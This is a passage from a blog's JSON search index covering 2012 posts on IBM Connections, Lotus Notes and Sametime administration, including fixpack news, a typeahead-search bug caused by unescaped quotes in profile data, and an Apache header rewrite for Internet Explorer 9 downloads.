style=\"color:#268bd2\"\u003eid\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;b_uri_\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e${\u003c/span\u003e\u003cspan style=\"color:#268bd2\"\u003ebookmark\u003c/span\u003e.uuid\u003cspan style=\"color:#2aa198\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u0026lt;tango:safeURL\u0026gt;\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e${\u003c/span\u003e\u003cspan style=\"color:#268bd2\"\u003ebookmark\u003c/span\u003e.uri\u003cspan style=\"color:#2aa198\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#2aa198\"\u003e \u0026lt;/a\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#2aa198\"\u003e \u0026lt;/h4\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026lt;/div\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/08/Selection_003.png\" alt=\"Selection 003\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eTo recompile the jsps and activate this changes, edit and save the bookmarks.jsp.\u003c/p\u003e\n\u003ch1 id=\"windows\"\u003eWindows \u003ca href=\"#windows\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eEdit and save following files:\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-08-09-ibm-connections-open-communities-bookmarks-in-new-tab-or-window/","title":"IBM Connections – open Communities Bookmarks in new Tab or Window"},{"body":"Today i created a new mail rule in IBM Lotus Notes. I hate mails sent with high importance and i have some people which are sending all there mail with high importance!\nThe new traveler app adds “Dringend” to each mail marked with high importance. I read my mails all 10 to 20 minutes and i normally answer them in under two hours, but i do not answer faster, when i see a red “!”\nGet rid of this: I created a mail rule to remove the high importance tag. Thanks Notes!\n","excerpt":"\u003cp\u003eToday i created a new mail rule in IBM Lotus Notes. I hate mails sent\nwith high importance and i have some people which are sending all there\nmail with high importance!\u003c/p\u003e\n\u003cp\u003eThe new traveler app adds “Dringend” to each mail marked with high\nimportance. I read my mails all 10 to 20 minutes and i normally answer\nthem in under two hours, but i do not answer faster, when i see a red\n“!”\u003c/p\u003e\n\u003ch1 id=\"get-rid-of-this\"\u003eGet rid of this: \u003ca href=\"#get-rid-of-this\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/08/2012-08-08_15-18-38.png\" alt=\"2012 08 08 15 18 38\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eI created a mail rule to remove the high importance tag. Thanks Notes!\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-08-08-created-new-mail-rule/","title":"Created new mail rule"},{"body":"I think there is a wrong message in meeting delegation with comments function.\nWhen you delegate a meeting to someone else and add a comment, then the Comment window shows following info text:\n“The delegation notice will go out to the delegee and chair will receive the information about this delegation.”\nSo people who add a comment think the text will be sent to the person which get delegated. What do you think? Who will receive the comment?\nYes right, the chair will get it, not the delegee.\nI think this is very confusing for the users and perhaps they add comments which shouldn’t be read of the chair!\n","excerpt":"\u003cp\u003eI think there is a wrong message in meeting delegation with comments\nfunction.\u003c/p\u003e\n\u003cp\u003eWhen you delegate a meeting to someone else and add a comment, then the\nComment window shows following info text:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e“The delegation notice will go out to the delegee and chair will receive\nthe information about this delegation.”\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eSo people who add a comment think the text will be sent to the person\nwhich get delegated. What do you think? Who will receive the comment?\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eYes right, the chair will get it, not the delegee.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eI think this is very confusing for the users and perhaps they add\ncomments which shouldn’t be read of the chair!\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-08-02-meeting-delegation-with-comments-notes-8-5-x/","title":"Meeting delegation with comments (Notes 8.5.x)"},{"body":"Today i installed Kudos at a customer site. As always i come to the point to add the Leaderboard Widget to Connections Homepage, so i mapped my user in ISC – Applications – Homepage – Map User roles to the Admin Role. The existing entry for wasadmin (a non ldap user) was still present after adding my account.\nI logged in to Connections Homepage, but Administration Tab was missing. When i call the Administration Link https://connections.customersite.com/homepage/admin/openAdminPage.action i get a not authorized message. Restarting homepage didn’t solve the issue.\nAfter some tests i removed the local wasuser from admin role and logged in again. And voilà i got a administration tab. Don’t know why this happened, i’m sure that i have other installations where i get a administration tab with a local user. I will investigate this the next days.\n","excerpt":"\u003cp\u003eToday i installed \u003ca href=\"http://www.kudosbadges.com\" target=\"_blank\"\u003eKudos \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n at a customer site.\nAs always i come to the point to add the Leaderboard Widget to\nConnections Homepage, so i mapped my user in ISC – Applications –\nHomepage – Map User roles to the Admin Role. The existing entry for\nwasadmin (a non ldap user) was still present after adding my account.\u003c/p\u003e\n\u003cp\u003eI logged in to Connections Homepage, but Administration Tab was missing.\nWhen i call the Administration Link\n\u003ca href=\"https://connections.customersite.com/homepage/admin/openAdminPage.action\" target=\"_blank\"\u003ehttps://connections.customersite.com/homepage/admin/openAdminPage.action \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\ni get a not authorized message. Restarting homepage didn’t solve the\nissue.\u003c/p\u003e\n\u003cp\u003eAfter some tests i removed the local wasuser from admin role and logged\nin again. And voilà i got a administration tab. Don’t know why this\nhappened, i’m sure that i have other installations where i get a\nadministration tab with a local user. I will investigate this the next\ndays.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-07-31-missing-administration-tab-in-ibm-connections-3-0-1-1-cr1/","title":"Missing Administration Tab in IBM Connections 3.0.1.1 CR1"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/android/","title":"Android"},{"body":"IBM releases a new version of Connections Mobile App. It looks good and works very smooth. Wiki integration is much better than in the old one. The new app supports multi Server Accounts.\nhttp://feeds.lbenitez.com/ r/SocializeMe/3/GZIIfL3uZho/demo-ibm-connections-mobile-app-for.html[Demo: IBM Connections Mobile App for Android]:\nIBM today released a new update for the IBM Connections App for Android mobile devices. (Via Socialize Me )\n","excerpt":"\u003cp\u003eIBM releases a new version of Connections Mobile App. It looks good and\nworks very smooth. Wiki integration is much better than in the old one.\nThe new app supports multi Server Accounts.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://feeds.lbenitez.com/\" target=\"_blank\"\u003ehttp://feeds.lbenitez.com/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003csub\u003er/SocializeMe/\u003c/sub\u003e3/GZIIfL3uZho/demo-ibm-connections-mobile-app-for.html[Demo:\nIBM Connections Mobile App for Android]:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eIBM today released a new update for the IBM Connections App for Android\nmobile devices. \u003c/p\u003e\n\u003cp\u003e(Via \u003ca href=\"http://www.lbenitez.com/\" target=\"_blank\"\u003eSocialize Me \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n)\u003c/p\u003e\n\u003c/blockquote\u003e","ref":"https://stoeps.de/posts/2012/2012-06-08-ibm-connections-mobile-app-update-for-android-released/","title":"IBM Connections Mobile App Update for Android released"},{"body":"Cool day, thanks IBM.\nhttp://www-01.ibm.com/support/docview.wss?uid=swg21591682\u0026myns=swglotus\u0026mynp=OCSSYGQH\u0026mync=R ","excerpt":"\u003cp\u003eCool day, thanks IBM.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21591682\u0026amp;myns=swglotus\u0026amp;mynp=OCSSYGQH\u0026amp;mync=R\" target=\"_blank\"\u003ehttp://www-01.ibm.com/support/docview.wss?uid=swg21591682\u0026myns=swglotus\u0026mynp=OCSSYGQH\u0026mync=R \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-05-11-ibm-knowledgebase-links-to-my-article/","title":"IBM Knowledgebase links to my article :)"},{"body":"New Mobile fix for IBM Connections available:\nhttp://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm/Lotus\u0026product=ibm/Lotus/Lotus+Connections\u0026release=All\u0026platform=All\u0026function=fixId\u0026fixids=3.0.1.1-IC-Multi-Mobile-IFLO68457\u0026includeSupersedes=0\u0026source=fc ","excerpt":"\u003cp\u003eNew Mobile fix for IBM Connections available:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm/Lotus\u0026amp;product=ibm/Lotus/Lotus\u0026#43;Connections\u0026amp;release=All\u0026amp;platform=All\u0026amp;function=fixId\u0026amp;fixids=3.0.1.1-IC-Multi-Mobile-IFLO68457\u0026amp;includeSupersedes=0\u0026amp;source=fc\" target=\"_blank\"\u003ehttp://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm/Lotus\u0026product=ibm/Lotus/Lotus+Connections\u0026release=All\u0026platform=All\u0026function=fixId\u0026fixids=3.0.1.1-IC-Multi-Mobile-IFLO68457\u0026includeSupersedes=0\u0026source=fc \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-05-02-new-mobile-fix-for-ibm-connections-iflo68457/","title":"New Mobile Fix for IBM Connections IFLO68457"},{"body":"A few days ago a colleague asked me, why i use Notes only on my main display of the Macbook Pro. I didn’t remember the reason, but today i discovered it again.\nWhen i move my Notes Client window (8.5.3) on the second display, i can’t use column sorting when clicking on the column header. Then i moved the window bar (File, Edit, …) of Mac OS X (Lion) on the external monitor too and … I’m able to sort my inbox, when i click on the column header (like subject, date and so on).\nI played around a little bit and tested some other Mac OS Clients in the office and i can reproduce it. Only on displays with the windowbar i can change sorting, when i click on the column header.\nUpdate IBM acknowledged the problem: http://www.ibm.com/support/docview.wss?uid=swg21584595\u0026myns=swglotus\u0026mynp=OCSSKTWP\u0026mync=R ","excerpt":"\u003cp\u003eA few days ago a colleague asked me, why i use Notes only on my main\ndisplay of the Macbook Pro. I didn’t remember the reason, but today i\ndiscovered it again.\u003c/p\u003e\n\u003cp\u003eWhen i move my Notes Client window (8.5.3) on the second display, i\ncan’t use column sorting when clicking on the column header. Then i\nmoved the window bar (File, Edit, …) of Mac OS X (Lion) on the external\nmonitor too and … I’m able to sort my inbox, when i click on the column\nheader (like subject, date and so on).\u003c/p\u003e\n\u003cp\u003eI played around a little bit and tested some other Mac OS Clients in the\noffice and i can reproduce it. Only on displays with the windowbar i can\nchange sorting, when i click on the column header.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-04-04-lotus-notes-on-mac-os-change-column-sorting-broken-on-second-display-broken/","title":"Lotus Notes on Mac OS change column sorting broken on second display"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/macbook/","title":"Macbook"},{"body":"Please remember to backup your data!\n[…] When a hard drive fails and the data isn’t backed up, it’s gone. And it’s not a question of if your drive will fail, it’s when. Remember, every single computer component will fail eventually. […]\nRead more ","excerpt":"\u003cp\u003ePlease remember to backup your data!\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…] When a hard drive fails and the data isn’t backed up, it’s gone. And\nit’s not a question of if your drive will fail, it’s when. Remember,\nevery single computer component will fail eventually. […]\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.worldbackupday.com/\" target=\"_blank\"\u003eRead more \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-31-today-is-world-backup-day/","title":"Today is World Backup Day"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/admin/","title":"Admin"},{"body":"A very good cite on Sysadmins:\nIf you are rewarded for cleaning up after floods but not recognized for building flood prevention instead, pretty soon you start losing enthusiasm for trying to argue your bosses into funding that flood prevention.\nMore: http://utcc.utoronto.ca/~cks/space/blog/sysadmin/OpsHeroism ","excerpt":"\u003cp\u003eA very good cite on Sysadmins:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eIf you are rewarded for cleaning up after floods but not recognized for\nbuilding flood prevention instead, pretty soon you start losing\nenthusiasm for trying to argue your bosses into funding that flood\nprevention.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eMore: \u003ca href=\"http://utcc.utoronto.ca/~cks/space/blog/sysadmin/OpsHeroism\" target=\"_blank\"\u003ehttp://utcc.utoronto.ca/~cks/space/blog/sysadmin/OpsHeroism \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-29-flood-prevention/","title":"Flood prevention"},{"body":"There is a new Sametime Fix for integration in Connections 3.0.1.1 and portal 7.0.0.2: OBEN-8SRQTP\nVia http://www-01.ibm.com/support/docview.wss?uid=swg21588293 I installed Connections 3.0.1.1 with a Sametime Proxy 8.5.1 (like installation of 3.0.1) and it works.\n","excerpt":"\u003cp\u003eThere is a new Sametime Fix for integration in Connections 3.0.1.1 and\nportal 7.0.0.2: OBEN-8SRQTP\u003c/p\u003e\n\u003cp\u003eVia \u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21588293\" target=\"_blank\"\u003ehttp://www-01.ibm.com/support/docview.wss?uid=swg21588293 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eI installed Connections 3.0.1.1 with a Sametime Proxy 8.5.1 (like\ninstallation of 3.0.1) and it works.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-27-sametime-fix-oben-85dlgs-superseeded/","title":"Sametime Fix OBEN-85DLGS superseeded"},{"body":"The new fixpack for IBM Connections 3.0.1 is available. You can download the nearly 1 GB sized file on IBM Fixcentral. Fixlist and installation instructions are linked on Fix Central.\nUpdate Some details of the Readme :\nPrerequists WebSphere Application Server fixes: PM56596 and ​PM51310​ to WAS 7.0.0.x. Please contact IBM WebSphere Application Server support to obtain the fixes.​\nIntegration with Sametime 8.5.2 requires Sametime hotfix OBEN-8SDLGS. Please contact IBM Sametime support to obtain the fix.​\nSo no direct download of the prerequists! You have to contact IBM Support for these downloads.\nUpdate 21.03.2012 IBM changes the Readme for this Fixpack. They deleted the prerequisted WAS Fixes. So you can install without PM56596 and PM51310.\n","excerpt":"\u003cp\u003eThe new fixpack for IBM Connections 3.0.1 is available. You can download\nthe nearly 1 GB sized file on\n\u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm/Lotus\u0026amp;product=ibm/Lotus/Lotus\u0026#43;Connections\u0026amp;release=All\u0026amp;platform=All\u0026amp;function=fixId\u0026amp;fixids=3.0.1.0-LC-Multi-FP001\u0026amp;includeSupersedes=0\u0026amp;source=fc\" target=\"_blank\"\u003eIBM\nFixcentral. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eFixlist and installation instructions are linked on Fix Central.\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eSome details of the\n\u003ca href=\"https://www-304.ibm.com/support/docview.wss?uid=swg21584430\" target=\"_blank\"\u003eReadme \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003ch2 id=\"prerequists\"\u003ePrerequists \u003ca href=\"#prerequists\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eWebSphere Application Server fixes: PM56596 and ​PM51310​ to WAS\n7.0.0.x. Please contact IBM WebSphere Application Server support to\nobtain the fixes.​\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eIntegration with Sametime 8.5.2 requires Sametime hotfix OBEN-8SDLGS.\nPlease contact IBM Sametime support to obtain the fix.​\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSo no direct download of the prerequists! You have to contact IBM\nSupport for these downloads.\u003c/p\u003e\n\u003ch1 id=\"update-21032012\"\u003eUpdate 21.03.2012 \u003ca href=\"#update-21032012\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eIBM changes the Readme for this Fixpack. They deleted the prerequisted\nWAS Fixes. So you can install without PM56596 and PM51310.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-22-fp01-for-ibm-connections-is-available/","title":"FP01 for IBM Connections is available (Update)"},{"body":"The required fix OBEN-85DLGS for IBM Connections 3.0.1.1 is available for download at IBM Fix Central now.\nCite from Fix Readme :\nInstallation instructions\nPrerequisite: The Sametime System Console must be at version 8.5.2 IFR\nIf not, then you will see a failure message during the fix install noting an incorrect version level. Refer to Installing Sametime 8.5.2 Interim Feature Release 1 on the Sametime System Console to get started . This fix must be installed on top of a Sametime Proxy Server 8.5.2 Interim Feature Release 1 (IFR 1). If the server is running 8.5.2 (without the IFR 1 fix), then the IFR 1 fix will be automatically installed.\n","excerpt":"\u003cp\u003eThe required\n\u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~WebSphere\u0026amp;product=ibm/WebSphere/WebSphere\u0026#43;Application\u0026#43;Server\u0026amp;release=All\u0026amp;platform=Linux\u0026#43;64-bit,x86_64\u0026amp;function=fixId\u0026amp;fixids=8521-Sametime-Proxy-IF-OBEN-8SDLGS\u0026amp;includeSupersedes=0\u0026amp;source=fc\" target=\"_blank\"\u003efix\nOBEN-85DLGS \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for IBM Connections 3.0.1.1 is available for download at\n\u003ca href=\"http://www-933.ibm.com/support/fixcentral\" target=\"_blank\"\u003eIBM Fix Central \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n now.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/2012-03-21_16-36-17.png\" alt=\"2012 03 21 16 36 17\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eCite from \u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21588293\" target=\"_blank\"\u003eFix\nReadme \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eInstallation instructions\u003c/strong\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003ePrerequisite:\u003c/strong\u003e The Sametime System Console must be at version 8.5.2 IFR\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eIf not, then you will see a failure message during the fix install\nnoting an incorrect version level. Refer to\n\u003ca href=\"http://www.lotus.com/ldd/stwiki.nsf/dx/Installing_Sametime_8.5.2_Interim_Feature_Release_1_on_the_Sametime_System_Console_st852ifr1\" target=\"_blank\"\u003eInstalling\nSametime 8.5.2 Interim Feature Release 1 on the Sametime System Console\nto get started \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/li\u003e\n\u003c/ol\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThis fix must be installed on top of a Sametime Proxy Server 8.5.2\nInterim Feature Release 1 (IFR 1). If the server is running 8.5.2\n(without the IFR 1 fix), then the IFR 1 fix will be automatically\ninstalled.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-21-sametime-fix-oben-85dlgs-available/","title":"Sametime Fix OBEN-85DLGS available"},{"body":"On one of my IBM Connections Site i had a problem with directory search (better the typeahead search). When we searched single characters no business cards are displayed.\nI use Firebug for Chrome here and you see, that the search gets an result back from Connections, but no business cards are displayed.\nWhen i open this get statement i get a list of profile documents in JSON format:\nIn this case i a got a list of about 20 User profiles. When i search a little bit more detailed i get an error of a Javascript, which should interpret the JSON list. Thanks to the developer (I think it is a dojo script)! “There was an error!” is a great response for troubleshooting and searching the error on Google or Bing!\nThe list has following format:\n{ \u0026#34;identifier\u0026#34;:\u0026#34;member\u0026#34;, \u0026#34;label\u0026#34;:\u0026#34;name\u0026#34;, \u0026#34;items\u0026#34;:[ { \u0026#34;name\u0026#34;:\u0026#34;John Doe\u0026#34;, \u0026#34;userid\u0026#34;:\u0026#34;70026A2C-BE77-8491-C125-XXXXXX\u0026#34;, \u0026#34;uid\u0026#34;:\u0026#34;john.doe@stoeps.tld\u0026#34;, \u0026#34;member\u0026#34;:\u0026#34;john.doe@stoeps.tld\u0026#34;, \u0026#34;type\u0026#34;:\u0026#34;0\u0026#34;, \u0026#34;ext\u0026#34;:{ \u0026#34;first\u0026#34;:\u0026#34;\u0026#34;, \u0026#34;groupwareEmail\u0026#34;:\u0026#34;john.doe@stoeps.tld\u0026#34;, \u0026#34;guid\u0026#34;:\u0026#34;70026A2C-BE77-8491-C125-XXXXX\u0026#34;, \u0026#34;mobileNumber\u0026#34;:\u0026#34;+49 (123) 12 34 567\u0026#34;, \u0026#34;floor\u0026#34;:\u0026#34;2nd\u0026#34;, \u0026#34;email\u0026#34;:\u0026#34;john.doe@stoeps.tld\u0026#34;, \u0026#34;countryCode\u0026#34;:\u0026#34;DE\u0026#34;, \u0026#34;givenName\u0026#34;:\u0026#34;John\u0026#34;, \u0026#34;jobResp\u0026#34;:\u0026#34;Assistant\u0026#34;, \u0026#34;faxNumber\u0026#34;:\u0026#34;+49 (123) 456789\u0026#34;, \u0026#34;bldgId\u0026#34;:\u0026#34;Member of \u0026#34;Android Lovers\u0026#34;\u0026#34;, \u0026#34;uid\u0026#34;:\u0026#34;john.doe@stoeps.tld\u0026#34;, \u0026#34;sourceUrl\u0026#34;:\u0026#34;ldap://ldapserver:389/(undefined=_search_base_)?(\u0026amp;(ObjectClass=*)(Attribute=1))\u0026#34;, \u0026#34;surname\u0026#34;:\u0026#34;Doe\u0026#34;, \u0026#34;key\u0026#34;:\u0026#34;00009asdkfjakf\u0026#34;, \u0026#34;displayName\u0026#34;:\u0026#34;John Doe\u0026#34;, \u0026#34;telephoneNumber\u0026#34;:\u0026#34;+49 (1234) 56789\u0026#34;, \u0026#34;distinguishedName\u0026#34;:\u0026#34;CN=John Doe,OU=Admin,OU=DE,O=STOEPS\u0026#34;, \u0026#34;workLocationCode\u0026#34;:\u0026#34;Munich\u0026#34;, \u0026#34;timezone\u0026#34;:\u0026#34;Etc/GMT+12\u0026#34;, \u0026#34;lastUpdate\u0026#34;:\u0026#34;2012-03-05 14:23:34.504\u0026#34; } } ] } Problem here is the field bldgId: \u0026quot;Member of \u0026quot;Android Lovers\u0026quot;\u0026quot;.\nYou can see double ” which are not masked. Our IBM Connections User can fill nearly everything in the fields in Profiles, but get no warning if he uses quotes and quotes are not masked, when they are stored in the database.\nSo when you have on user who uses quotes in one of his Profile fields, the typeahead search displays no results for character searches which contains this user (and no error message).\nFinding such fields with regular expressions I tested the typeahead search on all characters and copied the result of the GET statement out of Firebug and developed a regexp to find double quoted strings:\n:\\\u0026quot;\\\u0026quot;[a-zA-Z0-9\\.\\/\\+\\-\\:\\s äöüÄÖÜ]\\\u0026quot;\nOn Mac OS X you can use RegExRX or Notepad++ on Windows to test this regexp and you will get the wrong field values.\nTDI and Typeahead You can see in the result list, that TDI Search Urls are saved in each profile document too! \u0026quot;sourceUrl\u0026quot;:\u0026quot;ldap://ldapserver:389/(undefined=search_base)?(\u0026amp;(ObjectClass=*)(Attribute=1))\u0026quot;, so please be careful, when you configure your search strings, because a double quoted attribute breaks typeahead search too!\n","excerpt":"\u003cp\u003eOn one of my IBM Connections Site i had a problem with directory search\n(better the typeahead search). When we searched single characters no\nbusiness cards are displayed.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/2012-03-19_13-18-11.png\" alt=\"2012 03 19 13 18 11\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eI use Firebug for Chrome here and you see, that the search gets an\nresult back from Connections, but no business cards are displayed.\u003c/p\u003e\n\u003cp\u003eWhen i open this get statement i get a list of profile documents in JSON\nformat:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/2012-03-19_13-23-48.png\" alt=\"2012 03 19 13 23 48\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eIn this case i a got a list of about 20 User profiles. When i search a\nlittle bit more detailed i get an error of a Javascript, which should\ninterpret the JSON list. Thanks to the developer (I think it is a dojo\nscript)! “There was an error!” is a great response for troubleshooting\nand searching the error on Google or Bing!\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-19-ibm-connections-directory-search-breaks-when-user-have-in-a-profile-field/","title":"IBM Connections Directory Search breaks when User have quotes in a profile field"},{"body":"File download with Internet Explorer 9 modifies the file extension and so files can’t open with any installed application. Problem occurs with IBM Connections 3.0.1 and 3.0.1 with installed CR3.\nIE 9 isn’t supported in the moment, but with a little tweak on IHS side, it is possible, that IE 9 download files without modifying the extension.\nBiggest problem here is, that opening attachments will open the “Open with” dialog, because no application is linked to a file extension .pdf .\nNormal file download with IE9 and IBM Connections: The http header shows following line for the download file and the name:\nContent-Disposition: attachment; filename*=UTF-8\u0026#39;en\u0026#39;%42%6f%6e%75%73%20%53%79%73%74%65%6d%20%76%32%2e%70%70%74%78; size=2563575; creation-date=\u0026#34;Fri, 2 Mar 2012 13:37:39 +0100\u0026#34;; modification-date=\u0026#34;Fri, 2 Mar 2012 13:37:39 +0100\u0026#34;; Sjaak Ursinus shows modifying http headers to solve issues with Chrome and IBM Connections Files . I made some tests with his explanation and added some lines in http.conf (you have to enable mod_headers and mod_setenvif):\n\u0026lt;IfModule mod_setenvif.c\u0026gt; SetEnvIf User-Agent \u0026#34;MSIE 9\\.\u0026#34; IE9 \u0026lt;IfModule mod_headers.c\u0026gt; Header edit Content-Disposition \u0026#34;^(.*)filename\\*=UTF-8[\u0026#39;a-z]{4}(.*)$\u0026#34; \u0026#34;$1filename*=$2\u0026#34; env=IE9 \u0026lt;/IfModule\u0026gt; \u0026lt;/IfModule\u0026gt;\u0026lt;br /\u0026gt; What does this part of the http.conf? I set an environment variable IE9, if the user agent contains “MSIE 9”.\nThe Header edit removes UTF-8’de’ from filename, if the environment variable is IE9 (env=IE9). I modified the regexp, that all languages after UTF-8 were removed. So the http header looks like this:\nContent-Disposition: attachment; filename*=%43%41%54%20%53%63%68%6c%c3%bc%73%73%65%6c%2e%65%6d%6c; size=7637; creation-date=\u0026#34;Fri, 30 Dec 2011 10:44:20 +0100\u0026#34;; modification-date=\u0026#34;Fri, 30 Dec 2011 10:44:20 +0100\u0026#34;; So you can open the file and it will be opened with the linked application for this extension.\n","excerpt":"\u003cp\u003eFile download with Internet Explorer 9 modifies the file extension and\nso files can’t open with any installed application. Problem occurs with\nIBM Connections 3.0.1 and 3.0.1 with installed CR3.\u003c/p\u003e\n\u003cp\u003eIE 9 isn’t supported in the moment, but with a little tweak on IHS side,\nit is possible, that IE 9 download files without modifying the\nextension.\u003c/p\u003e\n\u003cp\u003eBiggest problem here is, that opening attachments will open the “Open\nwith” dialog, because no application is linked to a file extension\n.pdf\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/ie9-download-1.png\" alt=\"1\" /\u003e\n\u003c/p\u003e\n\n.\u003c/p\u003e\n\u003ch1 id=\"normal-file-download-with-ie9-and-ibm-connections\"\u003eNormal file download with IE9 and IBM Connections: \u003ca href=\"#normal-file-download-with-ie9-and-ibm-connections\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/ie9-download-1.png\" alt=\"ie9 download 